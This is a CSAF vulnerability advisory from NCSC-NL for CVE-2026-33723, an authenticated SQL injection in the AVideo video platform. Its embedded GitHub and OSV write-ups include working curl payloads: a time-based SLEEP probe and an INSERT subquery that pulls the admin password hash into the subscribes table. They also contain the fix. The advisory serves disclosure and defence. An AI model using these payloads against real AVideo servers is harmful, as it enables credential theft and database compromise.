{ "document": { "category": "csaf_base", "csaf_version": "2.0", "distribution": { "tlp": { "label": "WHITE" } }, "lang": "en", "notes": [ { "category": "legal_disclaimer", "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy of incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings." } ], "publisher": { "category": "coordinator", "contact_details": "cert@ncsc.nl", "name": "National Cyber Security Centre", "namespace": "https://www.ncsc.nl/" }, "title": "CVE-2026-33723", "tracking": { "current_release_date": "2026-03-26T00:45:20.478175Z", "generator": { "date": "2026-02-17T15:00:00Z", "engine": { "name": "V.E.L.M.A", "version": "1.7" } }, "id": "CVE-2026-33723", "initial_release_date": "2026-03-24T13:52:44.069989Z", "revision_history": [ { "date": "2026-03-24T13:52:44.069989Z", "number": "1", "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)." }, { "date": "2026-03-24T13:52:55.323036Z", "number": "2", "summary": "NCSC Score created." }, { "date": "2026-03-24T14:25:31.074361Z", "number": "3", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (1).| References created (2).| CWES updated (1)." }, { "date": "2026-03-24T14:25:38.567824Z", "number": "4", "summary": "NCSC Score updated." }, { "date": "2026-03-24T20:56:55.815290Z", "number": "5", "summary": "Unknown change." }, { "date": "2026-03-24T20:56:59.125673Z", "number": "6", "summary": "NCSC Score updated." }, { "date": "2026-03-24T21:37:15.566602Z", "number": "7", "summary": "Source connected.| CVE status created. (valid)| EPSS created." }, { "date": "2026-03-24T21:37:34.795444Z", "number": "8", "summary": "NCSC Score updated." }, { "date": "2026-03-25T19:29:00.030087Z", "number": "9", "summary": "Products connected (1).| Product Identifiers created (1).| Exploits created (1)." }, { "date": "2026-03-25T19:29:06.782405Z", "number": "10", "summary": "NCSC Score updated." }, { "date": "2026-03-25T23:16:44.566494Z", "number": "11", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (4).| CWES updated (1)." }, { "date": "2026-03-25T23:16:46.913491Z", "number": "12", "summary": "NCSC Score updated." }, { "date": "2026-03-26T00:44:52.357285Z", "number": "13", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (18).| Product Identifiers created (17).| References created (3).| CWES updated (1)." } ], "status": "interim", "version": "13" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/<=26.0", "product": { "name": "vers:unknown/<=26.0", "product_id": "CSAFPID-5893889", "product_identification_helper": { "cpe": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*" } } } ], "category": "product_name", "name": "AVideo" }, { "branches": [ { "category": "product_version_range", "name": "vers:unknown/10.4", "product": { "name": "vers:unknown/10.4", "product_id": "CSAFPID-5656122", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@10.4" } } }, { "category": "product_version_range", "name": "vers:unknown/10.8", "product": { "name": "vers:unknown/10.8", "product_id": "CSAFPID-5656123", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@10.8" } } }, { "category": "product_version_range", "name": "vers:unknown/11", "product": { "name": "vers:unknown/11", "product_id": "CSAFPID-5656124", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@11" } } }, { "category": "product_version_range", "name": "vers:unknown/11.1", "product": { "name": "vers:unknown/11.1", "product_id": "CSAFPID-5656125", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@11.1" } } }, { "category": "product_version_range", "name": "vers:unknown/11.1.1", "product": { "name": "vers:unknown/11.1.1", "product_id": "CSAFPID-5656126", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@11.1.1" } } }, { "category": "product_version_range", "name": "vers:unknown/11.5", "product": { "name": "vers:unknown/11.5", "product_id": "CSAFPID-5656127", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@11.5" } } }, { "category": "product_version_range", "name": "vers:unknown/11.6", "product": { "name": "vers:unknown/11.6", "product_id": "CSAFPID-5656128", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@11.6" } } }, { "category": "product_version_range", "name": "vers:unknown/12.4", "product": { "name": "vers:unknown/12.4", "product_id": "CSAFPID-5656129", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@12.4" } } }, { "category": "product_version_range", "name": "vers:unknown/14.3", "product": { "name": "vers:unknown/14.3", "product_id": "CSAFPID-5656130", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@14.3" } } }, { "category": "product_version_range", "name": "vers:unknown/14.3.1", "product": { "name": "vers:unknown/14.3.1", "product_id": "CSAFPID-5656131", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@14.3.1" } } }, { "category": "product_version_range", "name": "vers:unknown/14.4", "product": { "name": "vers:unknown/14.4", "product_id": "CSAFPID-5656132", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@14.4" } } }, { "category": "product_version_range", "name": "vers:unknown/18.0", "product": { "name": "vers:unknown/18.0", "product_id": "CSAFPID-5656133", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@18.0" } } }, { "category": "product_version_range", "name": "vers:unknown/21.0", "product": { "name": "vers:unknown/21.0", "product_id": "CSAFPID-5721197", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@21.0" } } }, { "category": "product_version_range", "name": "vers:unknown/22.0", "product": { "name": "vers:unknown/22.0", "product_id": "CSAFPID-5772271", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@22.0" } } }, { "category": "product_version_range", "name": "vers:unknown/24.0", "product": { "name": "vers:unknown/24.0", "product_id": "CSAFPID-5772272", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@24.0" } } }, { "category": "product_version_range", "name": "vers:unknown/25.0", "product": { "name": "vers:unknown/25.0", "product_id": "CSAFPID-5840723", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@25.0" } } }, { "category": "product_version_range", "name": "vers:unknown/26.0", "product": { "name": "vers:unknown/26.0", "product_id": "CSAFPID-5878928", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@26.0" } } }, { "category": "product_version_range", "name": "vers:unknown/>=0|<=26.0", "product": { "name": "vers:unknown/>=0|<=26.0", "product_id": "CSAFPID-5878929" } } ], "category": "product_name", "name": "avideo" } ], "category": "vendor", "name": "WWBN" } ] }, "vulnerabilities": [ { "cve": "CVE-2026-33723", "cwe": { "id": "CWE-89", "name": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')" }, "notes": [ { "category": "description", "text": "WWBN AVideo is an open source video platform. In versions up to and including 26.0, the `Subscribe::save()` method in `objects/subscribe.php` concatenates the `$this->users_id` property directly into an INSERT SQL query without sanitization or parameterized binding. This property originates from `$_POST['user_id']` in both `subscribe.json.php` and `subscribeNotify.json.php`. An authenticated attacker can inject arbitrary SQL to extract sensitive data from any database table, including password hashes, API keys, and encryption salts. Commit 36dfae22059fbd66fd34bbc5568a838fc0efd66c contains a patch.", "title": "nvd - https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33723" }, { "category": "description", "text": "WWBN AVideo is an open source video platform. In versions up to and including 26.0, the `Subscribe::save()` method in `objects/subscribe.php` concatenates the `$this->users_id` property directly into an INSERT SQL query without sanitization or parameterized binding. This property originates from `$_POST['user_id']` in both `subscribe.json.php` and `subscribeNotify.json.php`. An authenticated attacker can inject arbitrary SQL to extract sensitive data from any database table, including password hashes, API keys, and encryption salts. Commit 36dfae22059fbd66fd34bbc5568a838fc0efd66c contains a patch.", "title": "cveprojectv5 - https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33723.json" }, { "category": "description", "text": "## Summary\n\nThe `Subscribe::save()` method in `objects/subscribe.php` concatenates the `$this->users_id` property directly into an INSERT SQL query without sanitization or parameterized binding. This property originates from `$_POST['user_id']` in both `subscribe.json.php` and `subscribeNotify.json.php`. An authenticated attacker can inject arbitrary SQL to extract sensitive data from any database table, including password hashes, API keys, and encryption salts.\n\n## Details\n\nThe vulnerability exists because of a disconnect between where `intval()` is applied and where the value is used in SQL.\n\n**Entry points** — `objects/subscribe.json.php:40` and `objects/subscribeNotify.json.php:23`:\n\n```php\n// subscribe.json.php line 40\n$subscribe = new Subscribe(0, $_POST['email'], $_POST['user_id'], User::getId());\n```\n\n**Constructor stores raw value** — `objects/subscribe.php:34`:\n\n```php\npublic function __construct($id, $email = \"\", $user_id = \"\", $subscriber_users_id = \"\")\n{\n // ...\n $this->users_id = $user_id; // Raw $_POST['user_id'], no sanitization\n $this->subscriber_users_id = $subscriber_users_id;\n if (empty($this->id)) {\n $this->loadFromId($this->subscriber_users_id, $user_id, \"\");\n }\n}\n```\n\n**`getSubscribeFromID` sanitizes local copies only** — `objects/subscribe.php:137-139`:\n\n```php\npublic static function getSubscribeFromID($subscriber_users_id, $user_id, $status = \"a\"){\n $subscriber_users_id = intval($subscriber_users_id); // Local variable only\n $user_id = intval($user_id); // Local variable only — $this->users_id is NOT affected\n```\n\nWhen `getSubscribeFromID` finds no matching subscription (the attacker simply targets a user_id they haven't subscribed to), `loadFromId()` returns false. The object's `$this->id` remains null, and `$this->users_id` retains the unsanitized injection payload.\n\n**Vulnerable sink** — `objects/subscribe.php:88`:\n\n```php\npublic function save()\n{\n if (!empty($this->id)) {\n // UPDATE path (not reached when $this->id is null)\n } else {\n $this->status = 'a';\n $sql = \"INSERT INTO subscribes (users_id, email, status, ip, created, modified, subscriber_users_id) \n VALUES ('{$this->users_id}', ...\"; // Direct concatenation of injected value\n }\n $saved = sqlDAL::writeSql($sql); // Called with NO $formats or $values\n```\n\n**`sqlDAL::writeSql` provides no protection** — `objects/mysql_dal.php:102`:\n\nWhen called without `$formats`/`$values` parameters (as `save()` does), the `eval_mysql_bind()` function at line 636 returns `true` without binding any parameters. The already-concatenated SQL string is passed directly to `$global['mysqli']->prepare()` and `execute()`, executing the injection as the prepared statement itself.\n\n## PoC\n\n**Prerequisites:** An authenticated session on the target AVideo instance.\n\n**Step 1: Confirm injection with time-based blind SQLi**\n\n```bash\n# Pick a user_id that the current user has NOT subscribed to (e.g., 99999)\n# The SLEEP(5) will cause a ~5 second delay confirming injection\ncurl -s -o /dev/null -w \"%{time_total}\" \\\n -b 'PHPSESSID=VALID_SESSION_ID' \\\n -d \"user_id=99999'+AND+SLEEP(5)+AND+'1\" \\\n https://target/objects/subscribe.json.php\n# Expected: ~5 second response time (vs <1 second normally)\n```\n\n**Step 2: Extract admin password hash via INSERT subquery**\n\n```bash\n# Inject a subquery that reads the admin password hash into the email column\ncurl -b 'PHPSESSID=VALID_SESSION_ID' \\\n -d \"user_id=99999',(SELECT+pass+FROM+users+WHERE+isAdmin=1+LIMIT+1),'a','1.1.1.1',now(),now(),'1');%23\" \\\n https://target/objects/subscribe.json.php\n```\n\nThis closes the `VALUES` clause with attacker-controlled data and comments out the rest of the query. The admin password hash is inserted into the `email` column of the `subscribes` table, which can be read back via the subscription list API.\n\n**Step 3: Read exfiltrated data**\n\nThe injected row is readable via any endpoint that queries the `subscribes` table and returns the `email` field (e.g., `getAllSubscribes()`).\n\nThe same attack works against `objects/subscribeNotify.json.php` via the same `user_id` parameter.\n\n## Impact\n\n- **Full database read access:** An attacker with any authenticated account can extract arbitrary data from all database tables using INSERT subqueries, including:\n - User password hashes (`users.pass`)\n - Admin credentials\n - Encryption salts and API keys from configuration tables\n - Email addresses and personal data of all users\n- **Data integrity:** The attacker can insert arbitrary rows into the `subscribes` table.\n- **Two affected endpoints:** Both `subscribe.json.php` and `subscribeNotify.json.php` pass raw `$_POST['user_id']` to the vulnerable code path.\n\n## Recommended Fix\n\nApply `intval()` to `$this->users_id` before use in the constructor, or better yet, use parameterized queries in `save()`.\n\n**Option 1 — Sanitize in constructor** (minimal fix):\n\n```php\n// objects/subscribe.php, constructor (line 34)\n- $this->users_id = $user_id;\n+ $this->users_id = intval($user_id);\n```\n\n**Option 2 — Use parameterized query in save()** (recommended):\n\n```php\n// objects/subscribe.php, save() method (lines 87-90)\npublic function save()\n{\n global $global;\n if (!empty($this->id)) {\n $sql = \"UPDATE subscribes SET status = ?, notify = ?, ip = ?, modified = now() WHERE id = ?\";\n $saved = sqlDAL::writeSql($sql, \"sssi\", [$this->status, $this->notify, getRealIpAddr(), $this->id]);\n } else {\n $this->status = 'a';\n $sql = \"INSERT INTO subscribes (users_id, email, status, ip, created, modified, subscriber_users_id) VALUES (?, ?, ?, ?, now(), now(), ?)\";\n $saved = sqlDAL::writeSql($sql, \"isssi\", [intval($this->users_id), $this->email, $this->status, getRealIpAddr(), intval($this->subscriber_users_id)]);\n }\n```\n\nOption 2 is strongly recommended as it also fixes the unsanitized `$this->email`, `$this->status`, and `getRealIpAddr()` values in both the INSERT and UPDATE paths, preventing any future injection through those fields.", "title": "github - https://api.github.com/advisories/GHSA-ffr8-fxhv-fv8h" }, { "category": "description", "text": "## Summary\n\nThe `Subscribe::save()` method in `objects/subscribe.php` concatenates the `$this->users_id` property directly into an INSERT SQL query without sanitization or parameterized binding. This property originates from `$_POST['user_id']` in both `subscribe.json.php` and `subscribeNotify.json.php`. An authenticated attacker can inject arbitrary SQL to extract sensitive data from any database table, including password hashes, API keys, and encryption salts.\n\n## Details\n\nThe vulnerability exists because of a disconnect between where `intval()` is applied and where the value is used in SQL.\n\n**Entry points** — `objects/subscribe.json.php:40` and `objects/subscribeNotify.json.php:23`:\n\n```php\n// subscribe.json.php line 40\n$subscribe = new Subscribe(0, $_POST['email'], $_POST['user_id'], User::getId());\n```\n\n**Constructor stores raw value** — `objects/subscribe.php:34`:\n\n```php\npublic function __construct($id, $email = \"\", $user_id = \"\", $subscriber_users_id = \"\")\n{\n // ...\n $this->users_id = $user_id; // Raw $_POST['user_id'], no sanitization\n $this->subscriber_users_id = $subscriber_users_id;\n if (empty($this->id)) {\n $this->loadFromId($this->subscriber_users_id, $user_id, \"\");\n }\n}\n```\n\n**`getSubscribeFromID` sanitizes local copies only** — `objects/subscribe.php:137-139`:\n\n```php\npublic static function getSubscribeFromID($subscriber_users_id, $user_id, $status = \"a\"){\n $subscriber_users_id = intval($subscriber_users_id); // Local variable only\n $user_id = intval($user_id); // Local variable only — $this->users_id is NOT affected\n```\n\nWhen `getSubscribeFromID` finds no matching subscription (the attacker simply targets a user_id they haven't subscribed to), `loadFromId()` returns false. The object's `$this->id` remains null, and `$this->users_id` retains the unsanitized injection payload.\n\n**Vulnerable sink** — `objects/subscribe.php:88`:\n\n```php\npublic function save()\n{\n if (!empty($this->id)) {\n // UPDATE path (not reached when $this->id is null)\n } else {\n $this->status = 'a';\n $sql = \"INSERT INTO subscribes (users_id, email, status, ip, created, modified, subscriber_users_id) \n VALUES ('{$this->users_id}', ...\"; // Direct concatenation of injected value\n }\n $saved = sqlDAL::writeSql($sql); // Called with NO $formats or $values\n```\n\n**`sqlDAL::writeSql` provides no protection** — `objects/mysql_dal.php:102`:\n\nWhen called without `$formats`/`$values` parameters (as `save()` does), the `eval_mysql_bind()` function at line 636 returns `true` without binding any parameters. The already-concatenated SQL string is passed directly to `$global['mysqli']->prepare()` and `execute()`, executing the injection as the prepared statement itself.\n\n## PoC\n\n**Prerequisites:** An authenticated session on the target AVideo instance.\n\n**Step 1: Confirm injection with time-based blind SQLi**\n\n```bash\n# Pick a user_id that the current user has NOT subscribed to (e.g., 99999)\n# The SLEEP(5) will cause a ~5 second delay confirming injection\ncurl -s -o /dev/null -w \"%{time_total}\" \\\n -b 'PHPSESSID=VALID_SESSION_ID' \\\n -d \"user_id=99999'+AND+SLEEP(5)+AND+'1\" \\\n https://target/objects/subscribe.json.php\n# Expected: ~5 second response time (vs <1 second normally)\n```\n\n**Step 2: Extract admin password hash via INSERT subquery**\n\n```bash\n# Inject a subquery that reads the admin password hash into the email column\ncurl -b 'PHPSESSID=VALID_SESSION_ID' \\\n -d \"user_id=99999',(SELECT+pass+FROM+users+WHERE+isAdmin=1+LIMIT+1),'a','1.1.1.1',now(),now(),'1');%23\" \\\n https://target/objects/subscribe.json.php\n```\n\nThis closes the `VALUES` clause with attacker-controlled data and comments out the rest of the query. The admin password hash is inserted into the `email` column of the `subscribes` table, which can be read back via the subscription list API.\n\n**Step 3: Read exfiltrated data**\n\nThe injected row is readable via any endpoint that queries the `subscribes` table and returns the `email` field (e.g., `getAllSubscribes()`).\n\nThe same attack works against `objects/subscribeNotify.json.php` via the same `user_id` parameter.\n\n## Impact\n\n- **Full database read access:** An attacker with any authenticated account can extract arbitrary data from all database tables using INSERT subqueries, including:\n - User password hashes (`users.pass`)\n - Admin credentials\n - Encryption salts and API keys from configuration tables\n - Email addresses and personal data of all users\n- **Data integrity:** The attacker can insert arbitrary rows into the `subscribes` table.\n- **Two affected endpoints:** Both `subscribe.json.php` and `subscribeNotify.json.php` pass raw `$_POST['user_id']` to the vulnerable code path.\n\n## Recommended Fix\n\nApply `intval()` to `$this->users_id` before use in the constructor, or better yet, use parameterized queries in `save()`.\n\n**Option 1 — Sanitize in constructor** (minimal fix):\n\n```php\n// objects/subscribe.php, constructor (line 34)\n- $this->users_id = $user_id;\n+ $this->users_id = intval($user_id);\n```\n\n**Option 2 — Use parameterized query in save()** (recommended):\n\n```php\n// objects/subscribe.php, save() method (lines 87-90)\npublic function save()\n{\n global $global;\n if (!empty($this->id)) {\n $sql = \"UPDATE subscribes SET status = ?, notify = ?, ip = ?, modified = now() WHERE id = ?\";\n $saved = sqlDAL::writeSql($sql, \"sssi\", [$this->status, $this->notify, getRealIpAddr(), $this->id]);\n } else {\n $this->status = 'a';\n $sql = \"INSERT INTO subscribes (users_id, email, status, ip, created, modified, subscriber_users_id) VALUES (?, ?, ?, ?, now(), now(), ?)\";\n $saved = sqlDAL::writeSql($sql, \"isssi\", [intval($this->users_id), $this->email, $this->status, getRealIpAddr(), intval($this->subscriber_users_id)]);\n }\n```\n\nOption 2 is strongly recommended as it also fixes the unsanitized `$this->email`, `$this->status`, and `getRealIpAddr()` values in both the INSERT and UPDATE paths, preventing any future injection through those fields.", "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Packagist%2FGHSA-ffr8-fxhv-fv8h.json?alt=media" }, { "category": "other", "text": "0.00019", "title": "EPSS" }, { "category": "other", "text": "3.3", "title": "NCSC Score" }, { "category": "other", "text": "Is related to (a version of) an uncommon product, The value of the most recent EPSS score, The value of the most recent CVSS (V3) score, There is exploit data available from source Nvd", "title": "NCSC Score top decreasing factors" } ], "product_status": { "known_affected": [ "CSAFPID-5893889", "CSAFPID-5656122", "CSAFPID-5656123", "CSAFPID-5656124", "CSAFPID-5656125", "CSAFPID-5656126", "CSAFPID-5656127", "CSAFPID-5656128", "CSAFPID-5656129", "CSAFPID-5656130", "CSAFPID-5656131", "CSAFPID-5656132", "CSAFPID-5656133", "CSAFPID-5721197", "CSAFPID-5772271", "CSAFPID-5772272", "CSAFPID-5840723", "CSAFPID-5878928", "CSAFPID-5878929" ] }, "references": [ { "category": "external", "summary": "Source - nvd", "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33723" }, { "category": "external", "summary": "Source - cveprojectv5", "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33723.json" }, { "category": "external", "summary": "Source - first", "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0" }, { "category": "external", "summary": "Source - github", "url": "https://api.github.com/advisories/GHSA-ffr8-fxhv-fv8h" }, { "category": "external", "summary": "Source - osv", "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Packagist%2FGHSA-ffr8-fxhv-fv8h.json?alt=media" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; osv", "url": "https://github.com/WWBN/AVideo/commit/36dfae22059fbd66fd34bbc5568a838fc0efd66c" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; osv", "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-ffr8-fxhv-fv8h" }, { "category": "external", "summary": "Reference - github; osv", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33723" }, { "category": "external", "summary": "Reference - github", "url": "https://github.com/advisories/GHSA-ffr8-fxhv-fv8h" } ], "scores": [ { "cvss_v3": { "version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", "baseScore": 7.1, "baseSeverity": "HIGH" }, "products": [ "CSAFPID-5656122", "CSAFPID-5656123", "CSAFPID-5656124", "CSAFPID-5656125", "CSAFPID-5656126", "CSAFPID-5656127", "CSAFPID-5656128", "CSAFPID-5656129", "CSAFPID-5656130", "CSAFPID-5656131", "CSAFPID-5656132", "CSAFPID-5656133", "CSAFPID-5721197", "CSAFPID-5772271", "CSAFPID-5772272", "CSAFPID-5840723", "CSAFPID-5878928", "CSAFPID-5878929", "CSAFPID-5893889" ] } ], "title": "CVE-2026-33723" } ] }